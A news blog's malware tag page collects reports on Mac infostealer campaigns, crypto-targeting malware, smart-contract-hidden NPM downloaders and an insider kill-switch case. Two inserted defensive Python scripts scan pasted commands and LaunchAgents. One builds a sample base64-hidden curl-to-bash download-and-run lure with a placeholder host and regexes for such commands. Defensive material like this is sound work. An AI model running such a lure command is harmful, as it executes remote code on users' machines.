Tag: malware


Fraudulent GitHub Pages impersonate trusted companies to trick Mac users into installing malware, leaving financial and personal data at risk

by admin September 24, 2025



  • Atomic Stealer malware installs silently via fake GitHub Pages targeting Mac users
  • Attackers create multiple GitHub accounts to bypass platform takedowns repeatedly
  • Users copying commands from unverified websites risk serious system compromise

Cybersecurity researchers are warning Apple Mac users about a campaign using fraudulent GitHub repositories to spread malware and infostealers.

Research from LastPass Threat Intelligence, Mitigation, and Escalation (TIME) analysts found attackers are impersonating well-known companies to convince people to download fake Mac software.

Two fraudulent GitHub pages pretending to offer LastPass for Mac were first spotted on September 16, 2025, under the username “modhopmduck476.”



How the attack chain works

While these particular pages have been taken down, the incident suggests a broader pattern that continues to evolve.

The fake GitHub pages included links labeled “Install LastPass on MacBook,” which redirected to hxxps://ahoastock825[.]github[.]io/.github/lastpass.

From there, users were sent to macprograms-pro[.]com/mac-git-2-download.html and told to paste a command into their Mac’s terminal.

That command used a curl request to fetch a base64-encoded URL that decoded to bonoud[.]com/get3/install.sh.


The script then delivered an “Update” payload that installed Atomic Stealer (AMOS malware) into the Temp directory.
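A defender-side check for the paste-into-Terminal step described above, as an added example that is not part of the original article or of LastPass's report: it inspects a command copied from a web page before anyone runs it, decodes base64 tokens to reveal a hidden download URL, and flags download-and-execute constructs. The sample command, the `example.invalid` host and the verdict names are constructed for illustration.

```python
import base64
import binascii
import re

# Runs long enough to be an encoded URL; shorter runs are mostly ordinary words.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")
# Fetched content reaching a shell: "... | bash" or bash -c "$(curl ...)".
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:/bin/)?(?:ba|z)?sh\b")
SUBST_TO_SHELL = re.compile(r"\b(?:ba|z)?sh\s+-c\s+[\"']?\$\(")
URL = re.compile(r"^(?:https?://)?[a-z0-9.-]+\.[a-z]{2,}(?:/\S*)?$", re.I)

# Constructed sample with the shape the article describes; the host is a placeholder.
SAMPLE_URL = "https://downloads.example.invalid/get/install.sh"
SAMPLE_LURE = '/bin/bash -c "$(curl -fsSL $(echo %s | base64 -d))"' % (
    base64.b64encode(SAMPLE_URL.encode()).decode()
)


def decode_hidden_urls(command):
    """Return URLs that appear in the command only in base64-encoded form."""
    found = []
    for token in B64_TOKEN.findall(command):
        padded = token + "=" * (-len(token) % 4)
        try:
            text = base64.b64decode(padded, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not base64, or not text: ignore
        text = text.strip()
        if URL.match(text):
            found.append(text)
    return found


def inspect_command(command):
    """Classify a pasted command without executing any part of it."""
    hidden = decode_hidden_urls(command)
    fetch_and_execute = bool(
        DOWNLOADER.search(command)
        and (PIPE_TO_SHELL.search(command) or SUBST_TO_SHELL.search(command))
    )
    if hidden and fetch_and_execute:
        verdict = "do-not-run"      # hidden destination plus remote code execution
    elif hidden or fetch_and_execute:
        verdict = "review"          # one of the two signals on its own
    else:
        verdict = "no-finding"
    return {"verdict": verdict, "hidden_urls": hidden,
            "fetch_and_execute": fetch_and_execute}


if __name__ == "__main__":
    for cmd in (SAMPLE_LURE,
                "curl -fsSL https://example.invalid/install.sh | bash",
                "softwareupdate --list"):
        print(inspect_command(cmd)["verdict"], "<-", cmd)
```

A "no-finding" result only means these two patterns were absent; it does not make a command from an unverified site safe to run.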

Atomic Stealer, which has been active since April 2023, is a known infostealer used by financially motivated cybercrime groups.

Investigators have linked this campaign to many other fake repositories impersonating companies ranging from financial institutions to productivity apps.



The list of targeted names includes 1Password, Robinhood, Citibank, Docker, Shopify, Basecamp, and numerous others.

Attackers appear to create multiple GitHub usernames to bypass takedowns, using Search Engine Optimization to push their malicious links higher on search results in Google and Bing.

This technique increases the chances that Mac users searching for legitimate downloads will encounter the fraudulent pages first.

LastPass states it is “actively monitoring this campaign” while working on takedowns and sharing indicators of compromise to help others detect threats.

The attackers’ use of GitHub Pages reveals both the convenience and the risks of community platforms.

Fraudulent repositories can be set up quickly, and while GitHub can remove them, attackers often return under new aliases.

This cycle raises questions about how effectively such platforms can protect users.

How to stay safe

  • Only download software from verified sources to avoid malware and ransomware risks.
  • Avoid copying commands from unfamiliar websites to prevent unauthorized code execution.
  • Keep macOS and all installed software up to date to reduce vulnerabilities.
  • Use the best antivirus or security software that includes ransomware protection to block threats.
  • Enable regular system backups to recover files if ransomware or malware strikes.
  • Stay skeptical of unexpected links, emails, and pop-ups to minimize exposure.
  • Monitor official advisories from trusted vendors for timely security updates and guidance.
  • Configure strong, unique passwords and enable two-factor authentication for important accounts.


North Korean Hackers Hit Crypto Sector With BeaverTail Malware

by admin September 21, 2025



According to a recent report by The Hacker News, North Korean hackers are attempting to trick non-developer job applicants within the cryptocurrency sector with the BeaverTail malware, which steals logins and crypto wallets, and InvisibleFerret. 

Both macOS and Windows users should avoid strange downloads from GitHub or Vercel as well as suspicious scripts.  

How it works 

Applicants who fall for the sham are asked to record a short video on a fake website created by the attackers, where they are shown bogus microphone or camera errors and told to run “fix” commands. This is a common trick used by North Koreans and should automatically be treated as a red flag.

With the help of the aforementioned commands, the attackers then run a payload that installs BeaverTail and InvisibleFerret as a bundle. 

What is notable is that North Korean attackers used to target primarily tech-savvy developers with BeaverTail, but they have now changed their targets. The new version is a ready-to-run program, meaning that JavaScript or Python no longer needs to be installed on the victim’s machine.


The use of harmless-looking decoy files also makes it more challenging for security tools to detect the malware. Some parts of the malware are also hidden in password-protected files.

Growing threat 

The recent malware has been linked to North Korean attackers since BeaverTail was previously used by them. Moreover, some IPs are associated with the hermit kingdom. 

As reported by U.Today, Binance CEO Changpeng Zhao recently took to X (formerly Twitter) to warn about North Korean hackers posing as job candidates, potential employers, and users. 




Crypto Users Face Danger from New ModStealer Malware

by admin September 12, 2025



While the crypto industry is going through various security breaches, ModStealer, a new infostealer malware, is targeting crypto users on macOS, Windows, and Linux systems. Experts note that this malware can steal information on crypto wallets and access credentials of users. 

According to information from 9to5mac, Apple-focused security company Mosyle found the malware, which even major antivirus engines failed to catch for almost a month after it was uploaded to VirusTotal, an online service that checks files for harmful content.

The report says that ModStealer is being delivered to victims through malicious job postings that specifically target developers. Because it uses heavily obfuscated JavaScript files written with NodeJS, the malware remains completely undetectable by signature-based defenses.

“The malware’s main goal is data exfiltration, with a particular focus on cryptocurrency wallets, credential files, configuration details, and certificates,” Mosyle said. The security researchers also found targeting logic for different wallets, such as extensions for Safari and Chromium-based browsers. 

Malware’s perplexing infrastructure

The security company said that the malware stays on macOS by using the system to register as a background agent. While its server seems hosted in Finland, it is believed that the infrastructure is routed through Germany to hide where the operators are from.

“For security professionals, developers, and end users alike, this serves as a stark reminder that signature-based protections alone are not enough. Continuous monitoring, behavior-based defenses, and awareness of emerging threats are essential to stay ahead of adversaries,” Mosyle warns.

On macOS, the malware uses Apple’s own launchctl tool to install itself as a LaunchAgent, which keeps it on a victim’s Mac for a long time and makes it hard to find. From there, it watches what people do and sends sensitive data to a remote server.

Mosyle thinks that ModStealer fits the description of Malware-as-a-Service (MaaS), in which malware developers build and sell harmful packages to affiliates. This kind of business model has become more and more popular among cybercriminal gangs, especially when it comes to spreading infostealers.

Rise in Crypto Related Hacks 

Crypto hacks have been on the rise for the past few months. PeckShield, a blockchain security firm, says that hackers stole over $142 million in 17 attacks last month. The amount is 27.2% higher than the $111.6 million in June 2025.


Researchers Uncover Undetectable Malware Draining Crypto Browser Wallets

by admin September 12, 2025



In brief

  • ModStealer spreads through fake recruiter ads using obfuscated code.
  • It targets browser wallets and hides by disguising itself as a background helper.
  • The malware poses a direct threat to crypto users and platforms, Decrypt was told.

A new malware strain that can slip past antivirus checks and steal data from crypto wallets on Windows, Linux, and macOS systems was discovered on Thursday.

Dubbed ModStealer, it had remained undetected by major antivirus engines for almost a month at the time of disclosure, with its package being delivered through fake job recruiter ads targeting developers. 

The disclosure was made by security firm Mosyle, according to an initial report from 9to5Mac. Decrypt has reached out to Mosyle to learn more.



Distributing through fake job recruiter ads was an intentional tactic, according to Mosyle, because it was designed to reach developers who were likely already using or had Node.js environments installed.

ModStealer “evades detection by mainstream antivirus solutions and poses significant risks to the broader digital asset ecosystem,” Shān Zhang, chief information security officer at blockchain security firm Slowmist, told Decrypt. “Unlike traditional stealers, ModStealer stands out for its multi-platform support and stealthy ‘zero-detection’ execution chain.”

Once executed, the malware scans for browser-based crypto wallet extensions, system credentials, and digital certificates. 

It then “exfiltrates the data to remote C2 servers,” Zhang explained. A C2, or “Command and Control” server, is a centralized system used by cybercriminals to manage and control compromised devices in a network, acting as the operational hub for malware and cyberattacks.

On Apple hardware running macOS, the malware sets itself up through a “persistence method” to run automatically every time the computer starts by disguising itself as a background helper program. 

The setup keeps it running quietly without the user noticing. Signs of infection include a secret file called “.sysupdater.dat” and connections to a suspicious server, per the disclosure.
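A host check built on the two signs reported for ModStealer, the LaunchAgent persistence described in the Mosyle coverage and the “.sysupdater.dat” file named above, as an added example that is not from Mosyle, Decrypt or 9to5Mac. The hidden-path and temp-directory heuristic, the sample agents and the file's location are assumptions; the disclosure as quoted here gives only the file name.

```python
import os
import plistlib
import tempfile

IOC_FILENAME = ".sysupdater.dat"  # file name reported in the disclosure
TEMP_ROOTS = ("/tmp/", "/private/tmp/", "/var/folders/", "/private/var/folders/")


def agent_command(plist_path):
    """Return the argv a LaunchAgent plist would run, or [] if it cannot be read."""
    try:
        with open(plist_path, "rb") as fh:
            job = plistlib.load(fh)
    except Exception:  # plistlib raises different errors for broken XML and binary
        return []
    if not isinstance(job, dict):
        return []
    argv = list(job.get("ProgramArguments") or [])
    if job.get("Program"):
        argv.insert(0, job["Program"])
    return [a for a in argv if isinstance(a, str)]


def is_suspicious(arg):
    """Heuristic (assumption): absolute path that is hidden or in a temp directory."""
    if not arg.startswith("/"):
        return False
    hidden = any(part.startswith(".") for part in arg.split("/") if part)
    return hidden or arg.startswith(TEMP_ROOTS)


def audit_home(home):
    """List per-user LaunchAgents with suspicious targets and any IOC-named files."""
    findings = {"agents": [], "ioc_files": []}
    agents_dir = os.path.join(home, "Library", "LaunchAgents")
    if os.path.isdir(agents_dir):
        for name in sorted(os.listdir(agents_dir)):
            if name.endswith(".plist"):
                argv = agent_command(os.path.join(agents_dir, name))
                if any(is_suspicious(a) for a in argv):
                    findings["agents"].append((name, argv))
    for dirpath, _dirs, files in os.walk(home):
        if IOC_FILENAME in files:
            findings["ioc_files"].append(os.path.join(dirpath, IOC_FILENAME))
    return findings


def build_sample_home(root):
    """Write a constructed home: one ordinary agent, one hidden-path agent, one IOC file."""
    agents = os.path.join(root, "Library", "LaunchAgents")
    os.makedirs(agents)
    samples = {
        "com.example.updater.plist": {
            "Label": "com.example.updater",
            "Program": "/Applications/Example.app/Contents/MacOS/updater"},
        "com.example.helper.plist": {
            "Label": "com.example.helper", "RunAtLoad": True,
            "ProgramArguments": ["/usr/local/bin/node",
                                 "/Users/sample/.cache/.helper.js"]},
    }
    for name, job in samples.items():
        with open(os.path.join(agents, name), "wb") as fh:
            plistlib.dump(job, fh)
    ioc_dir = os.path.join(root, "Documents")  # location is an assumption
    os.makedirs(ioc_dir)
    open(os.path.join(ioc_dir, IOC_FILENAME), "wb").close()
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        print(audit_home(build_sample_home(os.path.join(tmp, "home"))))
```

On a real Mac, `audit_home(os.path.expanduser("~"))` runs the same check; a flagged agent is a lead to investigate, since legitimate software also registers LaunchAgents.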

“Although common in isolation, these persistence methods combined with strong obfuscation make ModStealer resilient against signature-based security tools,” Zhang said.

The discovery of ModStealer comes on the heels of a related warning from Ledger CTO Charles Guillemet, who disclosed Tuesday that attackers had compromised an NPM developer account and attempted to spread malicious code that could silently replace crypto wallet addresses during transactions, putting funds at risk across multiple blockchains.

Although the attack was detected early and failed, Guillemet later noted that the compromised packages had been hooked to Ethereum, Solana, and other chains.

“If your funds sit in a software wallet or on an exchange, you’re one code execution away from losing everything,” Guillemet tweeted hours after his initial warning.

Asked about the new malware’s possible impact, Zhang warned that ModStealer poses a “direct threat to crypto users and platforms.”

For end-users, “private keys, seed phrases, and exchange API keys may be compromised, resulting in direct asset loss,” Zhang said, adding that for the crypto industry, “mass theft of browser extension wallet data could trigger large-scale on-chain exploits, eroding trust and amplifying supply chain risks.”


Ethereum Devs Targeted by Malware Hidden in Smart Contracts

by admin September 4, 2025



Hackers have found a new method to hide malicious software, commands, and links within Ethereum smart contracts to avoid detection by security scans, as attacks targeting code repositories become more advanced. 

ReversingLabs cybersecurity researchers have discovered two fake JavaScript packages, named “colortoolsv2” and “mimelib2,” in the Node Package Manager (NPM). 

These packages, added in July, trick security systems by hiding their malicious instructions inside Ethereum smart contracts. In a blog post published on Wednesday, ReversingLabs researcher Lucija Valentić revealed that these packages function as downloaders, extracting command and control server addresses from Ethereum blockchain smart contracts. 

Once installed, the packages query the blockchain to fetch URLs for downloading second-stage malware, which delivers the malicious payload. This approach makes detection challenging, as blockchain traffic appears legitimate, masking the malicious activity. 

Hackers are using Ethereum Smart Contracts in a new tactic

Hackers, including the North Korean-linked Lazarus Group, have used Ethereum smart contracts before to spread harmful software, or malware. However, ReversingLabs researcher Lucija Valentić has explained that this new tactic is different. 

Now, hackers are hiding web addresses (URLs) inside Ethereum smart contracts. These URLs direct victims to download harmful software onto their devices. The trick hasn’t been seen before, and it’s harder for security systems to catch because fetching the URLs from the blockchain looks like legitimate traffic.

Valentić says the incident shows how quickly hackers are finding new ways to avoid detection while targeting developers and open-source code platforms. This malware is part of a larger scam on GitHub, where hackers create fraudulent projects for cryptocurrency trading bots. 

To make these projects look real, they add fake updates, create fake user accounts, use multiple fake maintainers, and include professional-looking descriptions. The misleading information tricks developers into trusting and downloading the malicious software. 

In 2024, security experts found 23 scams involving cryptocurrencies on open-source code platforms, where hackers hid malicious software. According to Valentić, this new type of attack reveals that the scams are becoming more sophisticated. 

Further, in April, hackers created a fake GitHub project pretending to be a Solana trading bot, which secretly installed malware to steal cryptocurrency wallet information. They also targeted “Bitcoinlib,” a tool that helps developers work with Bitcoin, showing how hackers are attacking different platforms to steal from users.


Attackers Are Now Using Ether Smart Contracts to Mask Malware

by admin September 4, 2025



Ethereum has become the latest front for software supply chain attacks.

Researchers at ReversingLabs earlier this week uncovered two malicious NPM packages that used Ethereum smart contracts to conceal harmful code, allowing the malware to bypass traditional security checks.

NPM is a package manager for the runtime environment Node.js and is considered the world’s largest software registry, where developers can access and share code that contributes to millions of software programs.

The packages, “colortoolsv2” and “mimelib2,” were uploaded to the widely used Node Package Manager repository in July. They appeared to be simple utilities at first glance, but in practice, they tapped Ethereum’s blockchain to fetch hidden URLs that directed compromised systems to download second-stage malware.

By embedding these commands within a smart contract, attackers disguised their activity as legitimate blockchain traffic, making detection more difficult.

“This is something we haven’t seen previously,” ReversingLabs researcher Lucija Valentić said in their report. “It highlights the fast evolution of detection evasion strategies by malicious actors who are trolling open source repositories and developers.”

The technique builds on an old playbook. Past attacks have used trusted services like GitHub Gists, Google Drive, or OneDrive to host malicious links. By leveraging Ethereum smart contracts instead, attackers added a crypto-flavored twist to an already dangerous supply chain tactic.

The incident is part of a broader campaign. ReversingLabs discovered the packages tied to fake GitHub repositories that posed as cryptocurrency trading bots. These repos were padded with fabricated commits, bogus user accounts, and inflated star counts to look legitimate.

Developers who pulled the code risked importing malware without being aware of it.

Supply chain risks in open-source crypto tooling are not new. Last year, researchers flagged more than 20 malicious campaigns targeting developers through repositories such as npm and PyPI.

Many were aimed at stealing wallet credentials or installing crypto miners. But the use of Ethereum smart contracts as a delivery mechanism shows adversaries are adapting quickly to blend into blockchain ecosystems.

A takeaway for developers is that popular commits or active maintainers can be faked, and even seemingly innocuous packages may carry hidden payloads.




Disgruntled coder who admitted to deploying a malware ‘kill switch’ to get back at his bosses sentenced to 4 years in prison

by admin August 25, 2025



After a total wait even longer than his prison sentence and being convicted in March, former software developer Davis Lu has finally been sentenced for a malware kill switch scheme he deployed in 2019.

Lu will have to serve four years in prison followed by three years of supervised release. It’s the end to a long saga that began with a frustration many are all too familiar with: a demotion. In 2018, the company Lu worked for as a senior software developer, Eaton Corporation, went through a corporate realignment.

As a result, Lu was demoted. He stayed at the company until September 9, 2019, when he was finally put on leave and asked to return his company laptop. Lu had apparently been planning for this. When he was demoted, he “began sabotaging his employer’s systems,” according to the Department of Justice.



Lu’s havoc on his former employer included malicious code that sparked system crashes, blocked logins, deleted files, and ultimately ended with a “kill switch” that, according to the DoJ, locked out all users if Lu’s credentials were ever disabled. Lu even named the kill switch “IsDLEnabledinAD,” short for “Is Davis Lu enabled in Active Directory.”

When Lu was put on leave, that kill switch automatically triggered. The kill switch and Lu’s other malicious code resulted in “hundreds of thousands of dollars in losses” for his former employer. Now, it has also resulted in jail time for Lu, who was convicted in March. That conviction is not surprising since he straight up admitted to sabotaging his former employer all the way back in October 2019.

However, Lu didn’t plead guilty and even reportedly designed his malicious code to make it look like it was coming from co-workers who took over his duties. Lu also deleted encrypted data from his company laptop before handing it over. But that clearly wasn’t enough to stop the FBI from tying the cyber sabotage back to Lu.
